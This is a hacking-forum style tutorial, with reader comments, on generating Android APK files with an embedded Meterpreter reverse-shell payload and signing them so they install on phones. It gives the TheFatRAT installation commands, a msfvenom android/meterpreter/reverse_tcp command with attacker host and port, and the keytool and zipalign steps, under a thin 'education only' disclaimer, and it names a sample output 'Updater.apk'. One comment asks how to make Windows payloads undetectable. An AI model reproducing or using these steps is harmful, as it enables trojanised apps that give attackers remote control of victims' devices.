Hi My Fellow H4CK3Rs
- Today, I`m gonna show you: "How To Sign the APK File with Embedded Payload". The following Methods work 100%. So, Follow the steps carefully. But before getting started, if you are a beginner, then read the following Answers first...
Q: Why we have to Sign the APK File?
In Modern Android Phones, Un-Signed APK files can be Easily installed. But Older versions of Android does not Support the installation of Unsigned APK files. This is not a common Problem. But for Publishers and Hackers, it can create a lot of problem, because Unsigned APK files give error on Older Android Versions & cannot be EVEN Uploaded on Google Play or Play Store.
To Manually & Properly Sign the APK, you have to Follow the Following steps Carefully!
DISCLAIMER : This Thread is only for Education Purposes. I will not be Responsible of Any Illegal use of this information. Try not to HACK the Androids, other than your`s.
Q: How to Sign APK File?
Signing the APK is not so Difficult. You have to be Patient, and Comment below if you face any problems or errors. So, I`ve listed THREE Methods below to Sign the APK FILE. Method#1 is Easy but requires 700mb of disc space for installing required files, Method#2 is a bit Difficult but does`nt requires much space, but Method #3 is EASIEST Method of signing the APK File (It can only be done on android) .
- So Lets Start ...
Method #1: Using TheFatRAT
Requirements
1). Kali LinuX (Latest Version is Preferred)
2). TheFatRAT (Installation instructions are Discussed Below)
3). At Least 500mb Internet Data (For Proper Downloading of TheFatRAT)
Installation
1). First You Have to Download TheFatRAT. For this, enter the following command on Terminal :
git clone github.com/Screetsec/TheFatRat.git
Now the Downloading of TheFatRAT will get start. Remember, it will install in your ROOT folder.
2). When the Downloading Complete, (In Same Terminal) Enter :
cd TheFatRat
Then :
chmod +x setup.sh && ./setup.sh
Now wait till it Install its Components. It may take a while.
More Information About TheFatRAT can be found here :
github.com/Screetsec/TheFatRat
Signing the APK File
First of all, Remember that Option #5 of TheFatRAT does not works properly. So ignore it.
1). When Installation of TheFatRAT Completes, Open a new Terminal, and Enter:
fatrat
(Just Like we enter msfconsole etc)
Wait till it load its components Completely and the following Screen Appear.
2). Select Option #1 , (To select, Just type 1 and press Enter)
After Selecting 1, It may look like this:
3). Select Option #3
4). Select your IPv4 Address in Set LHOST IP: (I`m typing LHOST: 0.0.0.0 for example) and Your desired port in Set LPORT: (You can Type 4444 or 8080)
If you don`t know how to find IP address, Visit WhatIsMyIP Website , (I think you already knew that :)
5). After Entering your IP & Port, Enter Desired name for output file (i.e. payloadapk) when it ask.
6). Now Select one of 1st three Options (Option #3 is preferred)
7). Now wait till it Completely Generate SIGNED APK File. If you see Following Screen:
Then ,
|==================>DONE <================|
| You have Successfully Generated SIGNED APK |
|==================> FILE <=================|
Location
Your SIGNED Apk File, with Embedded Payload can be found here :
/root/TheFatRat/backdoored/payloadapk.apk
Method #2: Signing APK Manually
Requirements
1). Kali LinuX (Latest Version is Preferred)
2). Java v8 or above (Latest Version is Preferred)
3). ZipAlign Tool (Download it HERE , Install instructions included)
Installation
1). Latest version of JAVA is already installed in Kali LinuX. So you don`t need to download it Manually.
2). Zip-Align Tool can be found HERE. Installation instructions are Discussed there. If you have any Problems, Try 1st Method or Post them in Comments Section.
3). Here I am gonna Generate a Key named key.jks for payloadapk.apk , which is already generated by msfvenom command
Signing the APK File Manually
1). First, generate an Un-Signed APK File with Embedded Payload:
msfvenom -p android/meterpreter/reverse_tcp LHOST=(your-IP) LPORT=(desired-port) R > payloadapk.apk
2). Now we are gonna Generate a key key.jks with KeyTool. For this, type in Terminal (Screenshot Below):
keytool -genkey -v -keystore key.jks -keyalg RSA -keysize 2048 -validity 10000 -alias my-alias
3). Enter a Remember-able KeyStore Password. (i.e. 123456)
4). Now, it will ask about your Personnel Information. Just Randomly fill the Form (i.e. 777), and finally Type: yes , This will Successfully Generate a key.
6). BINGO...!!!!!!!! APK file has been signed. Now the most important step; Zip Aligning is Left, Just type the following command in terminal, and GET the Signed payloadapk.apk:
zipalign -v 4 payloadapk.apk payloadapk-Signed.apk
|==================>DONE <================|
| You have Successfully Generated SIGNED APK |
|==================> FILE <=================|
Location
Your Manually SIGNED Apk File, with Embedded Payload can be found here :
/root/payloadapk-Signed.apk
Method #3: Signing APK on Android
Requirements
1). MiXplorer File Explorer (Download latest version from UpToDown Website)
2). MiX Signer (Download it from Play Store)
Steps to Sign APK File
- Download MiXplorer File Explorer.
- Download its Addon: MiX Signer (Both links are already posted above)
- After that, just open MiXplorer File Manager and head to Un-Signed APK File (here, I named it as Updater.apk).
- Long Press on Un-Signed APK File and select MENU button on top right corner of MiXplorer, then select SIGN.
- It will display variety of options to sign APK File (AUTO is preferred).
- Select AUTO (for example) to Automatically & Successfully sign the apk file.
- Now, your APK file: (filename)-signed.apk is successfully signed and fully functional, also is of 9.9KB of size!.
Note: I`ve done a lot of work to get this information from the whole internet, and finally got these three Solutions. There is also another Method to sign the apk file, and that is; using Android Development Kit. Its Size was too large, so I did`nt downloaded it and find these Alternative ways of signing APK file, which are much easier than Android Development Kit. Anyway, if you find errors or you think I`ve missed something, then tell me in Comments Section. I will fix that as soon as possible. One thing I`ve not told before, THIS IS MY FIRST EVER POST ON INTERNET ...!!! Thanks for reading my thread (You can also join our WhatsApp Group for more information and Guides). BEST OF LUCK ...!!!
If You Liked My Guide, Then Don't Forget to Give Feedback ...!!!
!!!...===> Best Of Luck <===...!!!
10 Responses
Neither github working nor zipalign working (it says that keyalg is illegal option
You forgot to put "-" before keyalg
Amazing post. Thank you so much for sharing this information
I get this error when trying to use Fatrat: "There was a problem in the creation of your rat apk file , make sure your metasploit is running correctly" I ran metasploit in separate window hoping that it would help but to no avail
Not able to install zipalign, i think it is not in kali's repositories
In the method 2,I get this error in the final step:
zipalign: symbol lookup error: /usr/lib/x8664-linux-gnu/android/libbacktrace.so.0: undefined symbol: ZN11unwindstack12ElfInterfaceD2Ev
I found a lot of valuable content and information approaches after visiting your post. Thanks for sharing
wow... amazing!... is there a way of making windows/meterpreter/reverse_tcp too undetectable payload just as this?
Hi there! This guide was so helpful. Thank you for sharing :)
Engaging in activities like signing APK files with embedded payloads raises significant ethical and legal concerns. It's essential to prioritize responsible and lawful use of technology. Encouraging ethical behavior contributes to a safer digital landscape and fosters a culture of respect for privacy and security.
Share Your Thoughts